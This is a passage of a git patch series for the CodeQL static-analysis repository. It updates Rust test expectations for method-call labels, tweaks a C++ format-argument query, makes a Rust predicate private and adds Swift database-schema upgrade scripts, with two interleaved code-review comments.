b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected index ba9fb15a113..9f20d2b07dd 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getNameRef.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | gen_method_call_expr.rs:5:7:5:9 | foo | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:7:6:9 | foo | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | gen_method_call_expr.rs:5:7:5:9 | foo | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:7:6:9 | foo | 
diff --git a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected index b8e6631e189..b909a0f7793 100644 --- a/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected +++ b/rust/ql/test/extractor-tests/generated/MethodCallExpr/MethodCallExpr_getReceiver.expected @@ -1,2 +1,2 @@ -| gen_method_call_expr.rs:5:5:5:13 | ... .foo(...) | gen_method_call_expr.rs:5:5:5:5 | x | -| gen_method_call_expr.rs:6:5:6:25 | ... .foo(...) | gen_method_call_expr.rs:6:5:6:5 | x | +| gen_method_call_expr.rs:5:5:5:13 | x.foo(...) | gen_method_call_expr.rs:5:5:5:5 | x | +| gen_method_call_expr.rs:6:5:6:25 | x.foo(...) | gen_method_call_expr.rs:6:5:6:5 | x | diff --git a/rust/ql/test/extractor-tests/utf8/ast.expected b/rust/ql/test/extractor-tests/utf8/ast.expected index 560f834766e..f203c37ab44 100644 --- a/rust/ql/test/extractor-tests/utf8/ast.expected +++ b/rust/ql/test/extractor-tests/utf8/ast.expected @@ -12,7 +12,7 @@ | utf8_identifiers.rs:4:2:4:3 | ParamList | | utf8_identifiers.rs:4:5:4:6 | StmtList | | utf8_identifiers.rs:4:5:4:6 | { ... } | -| utf8_identifiers.rs:6:1:8:1 | Struct | +| utf8_identifiers.rs:6:1:8:1 | struct X | | utf8_identifiers.rs:6:8:6:8 | X | | utf8_identifiers.rs:6:10:8:1 | RecordFieldList | | utf8_identifiers.rs:7:5:7:5 | \u03b4 | diff --git a/rust/ql/test/library-tests/controlflow/Cfg.expected b/rust/ql/test/library-tests/controlflow/Cfg.expected index 3165b2354be..a2de927d5f1 100644 --- a/rust/ql/test/library-tests/controlflow/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow/Cfg.expected 
@@ -19,10 +19,10 @@ edges | test.rs:11:23:11:34 | ...::new | test.rs:11:23:11:36 | ...::new(...) | | | test.rs:11:23:11:36 | ...::new(...) | test.rs:11:13:11:19 | map | | | test.rs:12:9:12:11 | map | test.rs:12:20:12:21 | 37 | | -| test.rs:12:9:12:27 | ... .insert(...) | test.rs:10:22:13:5 | { ... } | | +| test.rs:12:9:12:27 | map.insert(...) | test.rs:10:22:13:5 | { ... } | | | test.rs:12:9:12:28 | ExprStmt | test.rs:12:9:12:11 | map | | | test.rs:12:20:12:21 | 37 | test.rs:12:24:12:26 | "a" | | -| test.rs:12:24:12:26 | "a" | test.rs:12:9:12:27 | ... .insert(...) | | +| test.rs:12:24:12:26 | "a" | test.rs:12:9:12:27 | map.insert(...) | | | test.rs:18:5:24:5 | enter fn next | test.rs:18:13:18:13 | n | | | test.rs:18:5:24:5 | exit fn next (normal) | test.rs:18:5:24:5 | exit fn next | | | test.rs:18:13:18:13 | n | test.rs:18:13:18:18 | ...: i64 | match | @@ -194,8 +194,8 @@ edges | test.rs:99:19:99:25 | Some(...) | test.rs:99:9:103:9 | while ... { ... } | no-match | | test.rs:99:19:99:25 | Some(...) | test.rs:99:24:99:24 | x | match | | test.rs:99:24:99:24 | x | test.rs:100:17:100:17 | x | match | -| test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | ... .next(...) | | -| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | Some(...) | | +| test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | iter.next(...) | | +| test.rs:99:29:99:39 | iter.next(...) | test.rs:99:19:99:25 | Some(...) | | | test.rs:99:41:103:9 | { ... } | test.rs:99:15:99:39 | let ... = ... | | | test.rs:100:13:102:13 | if ... {...} | test.rs:99:41:103:9 | { ... } | | | test.rs:100:17:100:17 | x | test.rs:100:22:100:22 | 5 | | 
@@ -631,8 +631,8 @@ edges | test.rs:292:87:294:5 | { ... } | test.rs:292:5:294:5 | exit fn test_question_mark_operator_1 (normal) | | | test.rs:293:9:293:10 | Ok | test.rs:293:12:293:12 | s | | | test.rs:293:9:293:33 | Ok(...) | test.rs:292:87:294:5 | { ... } | | -| test.rs:293:12:293:12 | s | test.rs:293:12:293:27 | ... .parse(...) | | -| test.rs:293:12:293:27 | ... .parse(...) | test.rs:293:12:293:28 | TryExpr | | +| test.rs:293:12:293:12 | s | test.rs:293:12:293:27 | s.parse(...) | | +| test.rs:293:12:293:27 | s.parse(...) | test.rs:293:12:293:28 | TryExpr | | | test.rs:293:12:293:28 | TryExpr | test.rs:292:5:294:5 | exit fn test_question_mark_operator_1 (normal) | return | | test.rs:293:12:293:28 | TryExpr | test.rs:293:32:293:32 | 4 | match | | test.rs:293:12:293:32 | ... + ... | test.rs:293:9:293:33 | Ok(...) | | diff --git a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected index 89fa0442293..406b84d68cd 100644 --- a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected 
@@ -16,16 +16,16 @@ edges | main.rs:41:26:44:5 | { ... } | main.rs:41:13:44:6 | pass_through(...) | provenance | | | main.rs:43:9:43:18 | source(...) | main.rs:41:26:44:5 | { ... } | provenance | | | main.rs:56:23:56:28 | ...: i64 | main.rs:57:14:57:14 | n | provenance | | -| main.rs:59:31:65:5 | { ... } | main.rs:77:13:77:25 | ... .get_data(...) | provenance | | +| main.rs:59:31:65:5 | { ... } | main.rs:77:13:77:25 | mn.get_data(...) | provenance | | | main.rs:63:13:63:21 | source(...) | main.rs:59:31:65:5 | { ... } | provenance | | | main.rs:66:28:66:33 | ...: i64 | main.rs:66:43:72:5 | { ... } | provenance | | -| main.rs:77:13:77:25 | ... .get_data(...) | main.rs:78:10:78:10 | a | provenance | | +| main.rs:77:13:77:25 | mn.get_data(...) | main.rs:78:10:78:10 | a | provenance | | | main.rs:83:13:83:21 | source(...) | main.rs:84:16:84:16 | a | provenance | | | main.rs:84:16:84:16 | a | main.rs:56:23:56:28 | ...: i64 | provenance | | | main.rs:89:13:89:21 | source(...) | main.rs:90:29:90:29 | a | provenance | | -| main.rs:90:13:90:30 | ... .data_through(...) | main.rs:91:10:91:10 | b | provenance | | +| main.rs:90:13:90:30 | mn.data_through(...) | main.rs:91:10:91:10 | b | provenance | | | main.rs:90:29:90:29 | a | main.rs:66:28:66:33 | ...: i64 | provenance | | -| main.rs:90:29:90:29 | a | main.rs:90:13:90:30 | ... .data_through(...) | provenance | | +| main.rs:90:29:90:29 | a | main.rs:90:13:90:30 | mn.data_through(...) | provenance | | nodes | main.rs:12:28:14:1 | { ... } | semmle.label | { ... } | | main.rs:13:5:13:13 | source(...) | semmle.label | source(...) | 
@@ -51,18 +51,18 @@ nodes | main.rs:63:13:63:21 | source(...) | semmle.label | source(...) | | main.rs:66:28:66:33 | ...: i64 | semmle.label | ...: i64 | | main.rs:66:43:72:5 | { ... } | semmle.label | { ... } | -| main.rs:77:13:77:25 | ... .get_data(...) | semmle.label | ... .get_data(...) | +| main.rs:77:13:77:25 | mn.get_data(...) | semmle.label | mn.get_data(...) | | main.rs:78:10:78:10 | a | semmle.label | a | | main.rs:83:13:83:21 | source(...) | semmle.label | source(...) | | main.rs:84:16:84:16 | a | semmle.label | a | | main.rs:89:13:89:21 | source(...) | semmle.label | source(...) | -| main.rs:90:13:90:30 | ... .data_through(...) | semmle.label | ... .data_through(...) | +| main.rs:90:13:90:30 | mn.data_through(...) | semmle.label | mn.data_through(...) | | main.rs:90:29:90:29 | a | semmle.label | a | | main.rs:91:10:91:10 | b | semmle.label | b | subpaths | main.rs:36:26:36:26 | a | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:36:13:36:27 | pass_through(...) | | main.rs:41:26:44:5 | { ... } | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:41:13:44:6 | pass_through(...) | -| main.rs:90:29:90:29 | a | main.rs:66:28:66:33 | ...: i64 | main.rs:66:43:72:5 | { ... } | main.rs:90:13:90:30 | ... .data_through(...) | +| main.rs:90:29:90:29 | a | main.rs:66:28:66:33 | ...: i64 | main.rs:66:43:72:5 | { ... } | main.rs:90:13:90:30 | mn.data_through(...) | testFailures #select | main.rs:18:10:18:10 | a | main.rs:13:5:13:13 | source(...) | main.rs:18:10:18:10 | a | $@ | main.rs:13:5:13:13 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected index eaf4a7b14d9..9bbde202217 100644 --- a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected +++ b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected 
@@ -12,12 +12,12 @@ | main.rs:45:5:45:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:57:9:57:15 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:63:13:63:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:77:13:77:25 | ... .get_data(...) | main.rs:59:5:65:5 | fn get_data | +| main.rs:77:13:77:25 | mn.get_data(...) | main.rs:59:5:65:5 | fn get_data | | main.rs:78:5:78:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:83:13:83:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:84:5:84:17 | ... .data_in(...) | main.rs:56:5:58:5 | fn data_in | +| main.rs:84:5:84:17 | mn.data_in(...) | main.rs:56:5:58:5 | fn data_in | | main.rs:89:13:89:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:90:13:90:30 | ... .data_through(...) | main.rs:66:5:72:5 | fn data_through | +| main.rs:90:13:90:30 | mn.data_through(...) | main.rs:66:5:72:5 | fn data_through | | main.rs:91:5:91:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:95:5:95:22 | data_out_of_call(...) | main.rs:16:1:19:1 | fn data_out_of_call | | main.rs:96:5:96:21 | data_in_to_call(...) | main.rs:25:1:28:1 | fn data_in_to_call | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index 5a8548771bc..9ee2f23f08c 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected 
@@ -35,7 +35,7 @@ edges | main.rs:214:14:214:14 | n | main.rs:214:25:214:25 | n | provenance | | | main.rs:224:14:224:29 | Some(...) [Some] | main.rs:225:10:225:11 | s1 [Some] | provenance | | | main.rs:224:19:224:28 | source(...) | main.rs:224:14:224:29 | Some(...) [Some] | provenance | | -| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | ... .unwrap(...) | provenance | | +| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | s1.unwrap(...) | provenance | | | main.rs:229:14:229:29 | Some(...) [Some] | main.rs:231:14:231:15 | s1 [Some] | provenance | | | main.rs:229:19:229:28 | source(...) | main.rs:229:14:229:29 | Some(...) [Some] | provenance | | | main.rs:231:14:231:15 | s1 [Some] | main.rs:231:14:231:16 | TryExpr | provenance | | @@ -158,7 +158,7 @@ nodes | main.rs:224:14:224:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:224:19:224:28 | source(...) | semmle.label | source(...) | | main.rs:225:10:225:11 | s1 [Some] | semmle.label | s1 [Some] | -| main.rs:225:10:225:20 | ... .unwrap(...) | semmle.label | ... .unwrap(...) | +| main.rs:225:10:225:20 | s1.unwrap(...) | semmle.label | s1.unwrap(...) | | main.rs:229:14:229:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:229:19:229:28 | source(...) | semmle.label | source(...) | | main.rs:231:14:231:15 | s1 [Some] | semmle.label | s1 [Some] | 
@@ -262,7 +262,7 @@ testFailures | main.rs:152:10:152:10 | a | main.rs:148:12:148:21 | source(...) | main.rs:152:10:152:10 | a | $@ | main.rs:148:12:148:21 | source(...) | source(...) | | main.rs:201:33:201:33 | n | main.rs:198:27:198:36 | source(...) | main.rs:201:33:201:33 | n | $@ | main.rs:198:27:198:36 | source(...) | source(...) | | main.rs:214:25:214:25 | n | main.rs:211:19:211:28 | source(...) | main.rs:214:25:214:25 | n | $@ | main.rs:211:19:211:28 | source(...) | source(...) | -| main.rs:225:10:225:20 | ... .unwrap(...) | main.rs:224:19:224:28 | source(...) | main.rs:225:10:225:20 | ... .unwrap(...) | $@ | main.rs:224:19:224:28 | source(...) | source(...) | +| main.rs:225:10:225:20 | s1.unwrap(...) | main.rs:224:19:224:28 | source(...) | main.rs:225:10:225:20 | s1.unwrap(...) | $@ | main.rs:224:19:224:28 | source(...) | source(...) | | main.rs:232:10:232:11 | i1 | main.rs:229:19:229:28 | source(...) | main.rs:232:10:232:11 | i1 | $@ | main.rs:229:19:229:28 | source(...) | source(...) | | main.rs:243:10:243:11 | i1 | main.rs:238:35:238:44 | source(...) | main.rs:243:10:243:11 | i1 | $@ | main.rs:238:35:238:44 | source(...) | source(...) | | main.rs:259:35:259:35 | n | main.rs:256:29:256:38 | source(...) | main.rs:259:35:259:35 | n | $@ | main.rs:256:29:256:38 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index a19ebe7a4b3..673f57d5e68 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected 
@@ -945,9 +945,9 @@ edges | variables.rs:428:24:430:5 | exit \|...\| ... (normal) | variables.rs:428:24:430:5 | exit \|...\| ... | | | variables.rs:428:27:430:5 | { ... } | variables.rs:428:24:430:5 | exit \|...\| ... (normal) | | | variables.rs:429:9:429:9 | z | variables.rs:429:22:429:22 | 1 | | -| variables.rs:429:9:429:23 | ... .add_assign(...) | variables.rs:428:27:430:5 | { ... } | | +| variables.rs:429:9:429:23 | z.add_assign(...) | variables.rs:428:27:430:5 | { ... } | | | variables.rs:429:9:429:24 | ExprStmt | variables.rs:429:9:429:9 | z | | -| variables.rs:429:22:429:22 | 1 | variables.rs:429:9:429:23 | ... .add_assign(...) | | +| variables.rs:429:22:429:22 | 1 | variables.rs:429:9:429:23 | z.add_assign(...) | | | variables.rs:431:5:431:12 | closure3 | variables.rs:431:5:431:14 | closure3(...) | | | variables.rs:431:5:431:14 | closure3(...) | variables.rs:432:5:432:17 | ExprStmt | | | variables.rs:431:5:431:15 | ExprStmt | variables.rs:431:5:431:12 | closure3 | | @@ -1094,8 +1094,8 @@ edges | variables.rs:493:5:493:13 | print_i64 | variables.rs:493:15:493:15 | a | | | variables.rs:493:5:493:25 | print_i64(...) | variables.rs:494:5:494:14 | ExprStmt | | | variables.rs:493:5:493:26 | ExprStmt | variables.rs:493:5:493:13 | print_i64 | | -| variables.rs:493:15:493:15 | a | variables.rs:493:15:493:24 | ... .my_get(...) | | -| variables.rs:493:15:493:24 | ... .my_get(...) | variables.rs:493:5:493:25 | print_i64(...) | | +| variables.rs:493:15:493:15 | a | variables.rs:493:15:493:24 | a.my_get(...) | | +| variables.rs:493:15:493:24 | a.my_get(...) | variables.rs:493:5:493:25 | print_i64(...) | | | variables.rs:494:5:494:5 | a | variables.rs:494:5:494:9 | a.val | | | variables.rs:494:5:494:9 | a.val | variables.rs:494:13:494:13 | 5 | | | variables.rs:494:5:494:13 | ... = ... | variables.rs:495:5:495:26 | ExprStmt | | 
@@ -1104,8 +1104,8 @@ edges | variables.rs:495:5:495:13 | print_i64 | variables.rs:495:15:495:15 | a | | | variables.rs:495:5:495:25 | print_i64(...) | variables.rs:496:5:496:28 | ExprStmt | | | variables.rs:495:5:495:26 | ExprStmt | variables.rs:495:5:495:13 | print_i64 | | -| variables.rs:495:15:495:15 | a | variables.rs:495:15:495:24 | ... .my_get(...) | | -| variables.rs:495:15:495:24 | ... .my_get(...) | variables.rs:495:5:495:25 | print_i64(...) | | +| variables.rs:495:15:495:15 | a | variables.rs:495:15:495:24 | a.my_get(...) | | +| variables.rs:495:15:495:24 | a.my_get(...) | variables.rs:495:5:495:25 | print_i64(...) | | | variables.rs:496:5:496:5 | a | variables.rs:496:25:496:25 | 2 | | | variables.rs:496:5:496:27 | ... = ... | variables.rs:497:5:497:26 | ExprStmt | | | variables.rs:496:5:496:28 | ExprStmt | variables.rs:496:5:496:5 | a | | @@ -1114,8 +1114,8 @@ edges | variables.rs:497:5:497:13 | print_i64 | variables.rs:497:15:497:15 | a | | | variables.rs:497:5:497:25 | print_i64(...) | variables.rs:491:14:498:1 | { ... } | | | variables.rs:497:5:497:26 | ExprStmt | variables.rs:497:5:497:13 | print_i64 | | -| variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | ... .my_get(...) | | -| variables.rs:497:15:497:24 | ... .my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | +| variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | a.my_get(...) | | +| variables.rs:497:15:497:24 | a.my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | | variables.rs:500:1:507:1 | enter fn arrays | variables.rs:501:5:501:26 | let ... = ... | | | variables.rs:500:1:507:1 | exit fn arrays (normal) | variables.rs:500:1:507:1 | exit fn arrays | | | variables.rs:500:13:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn arrays (normal) | | 
@@ -1197,8 +1197,8 @@ edges | variables.rs:529:7:529:11 | a | variables.rs:530:3:530:10 | ExprStmt | match | | variables.rs:529:15:529:33 | MyStruct {...} | variables.rs:529:7:529:11 | a | | | variables.rs:529:31:529:31 | 1 | variables.rs:529:15:529:33 | MyStruct {...} | | -| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | ... .bar(...) | | -| variables.rs:530:3:530:9 | ... .bar(...) | variables.rs:532:3:532:19 | ExprStmt | | +| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | a.bar(...) | | +| variables.rs:530:3:530:9 | a.bar(...) | variables.rs:532:3:532:19 | ExprStmt | | | variables.rs:530:3:530:10 | ExprStmt | variables.rs:530:3:530:3 | a | | | variables.rs:532:3:532:11 | print_i64 | variables.rs:532:13:532:13 | a | | | variables.rs:532:3:532:18 | print_i64(...) | variables.rs:528:30:533:1 | { ... } | | From 2da3d3609273acfd45f4e43febdd63a247ec7b2b Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 15:31:37 +0000 Subject: [PATCH 0858/1267] C++: Change note --- .../change-notes/2024-12-05-wrong-number-format-arguments.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md new file mode 100644 index 00000000000..abae2dfaa3d --- /dev/null +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The "Too few arguments to formatting function" query (`cpp/wrong-number-format-arguments`) query no longer produces results if an argument has an extraction error. From 129f21af2988531249ceb22304e93fe34b4836f5 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 09:37:41 +0000 Subject: [PATCH 0859/1267] Rust: Make a predicate private. --- rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll index 1037c95b436..d88a276091c 100644 --- a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll @@ -7,7 +7,7 @@ private import codeql.rust.Concepts private import codeql.rust.dataflow.DataFlow bindingset[algorithmName] -string simplifyAlgorithmName(string algorithmName) { +private string simplifyAlgorithmName(string algorithmName) { // the cipher library gives triple-DES names like "TdesEee2" and "TdesEde2" if algorithmName.matches("Tdes%") then result = "3des" else result = algorithmName } From 2cd4e1af9f387b6dbbe3b0a802104ae494aa70c6 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Fri, 6 Dec 2024 09:55:05 +0000 Subject: [PATCH 0860/1267] C++: Use Expr.stripType() --- cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql index 905c4307ad1..272ef8369d0 100644 --- a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql +++ b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql 
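Review bot: `simplifyAlgorithmName` still has no QLDoc, and its one inline comment describes the input rather than the contract. Now that it is private to RustCrypto.qll, a short doc comment above `bindingset[algorithmName]` would help, for example `/** Gets the algorithm name to report for algorithmName, mapping the cipher crate's Tdes* type names to "3des". */`. Note also that `matches("Tdes%")` is case-sensitive, so any other spelling passes through unchanged and would presumably not be classified as triple-DES by whatever consumes the result. It is worth confirming that `TdesEee2`/`TdesEde2`-style names are the only ones the library exposes.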
@@ -170,11 +170,7 @@ where ) and not arg.isAffectedByMacro() and not arg.isFromUninstantiatedTemplate(_) and - not actual.getUnspecifiedType() instanceof ErroneousType and - not ( - expected instanceof PointerType and - actual.getUnspecifiedType().(PointerType).getBaseType() instanceof ErroneousType - ) and + not actual.stripType() instanceof ErroneousType and not arg.(Call).mayBeFromImplicitlyDeclaredFunction() select arg, "This format specifier for type '" + expected.getName() + "' does not match the argument type '" + From 7ee3bf9fc88c9d71f5f39d59613056d78453fcd7 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 12:35:01 +0100 Subject: [PATCH 0861/1267] Swift: add update/downgrade scripts --- .../old.dbscheme | 2793 +++++++++++++++++ .../swift.dbscheme | 2786 ++++++++++++++++ .../upgrade.properties | 4 + .../old.dbscheme | 2786 ++++++++++++++++ .../swift.dbscheme | 2793 +++++++++++++++++ .../upgrade.properties | 2 + 6 files changed, 11164 insertions(+) create mode 100644 swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme create mode 100644 swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme create mode 100644 swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties create mode 100644 swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme create mode 100644 swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme create mode 100644 swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties diff --git a/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme new file mode 100644 index 00000000000..33db81ad4b6 --- /dev/null +++ b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme 
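Review bot: The new condition `not actual.stripType() instanceof ErroneousType` is broader than the two conditions it replaces. The removed pointer case applied only when `expected instanceof PointerType`, and that guard is gone. Assuming `stripType()` looks through pointer, reference and array layers, any argument whose innermost type failed to extract is now skipped regardless of what the format specifier expects. This is probably intended, but a real mismatch on partially extracted code (for example a pointer passed where an integer conversion is expected) would no longer be reported. A comment above the line such as `// skip arguments whose type, once pointers and typedefs are stripped, could not be extracted` and a test row for that case would make the trade-off explicit. The `where` clause begins outside this hunk.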
@@ -0,0 +1,2793 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: 
@availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: 
@unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: 
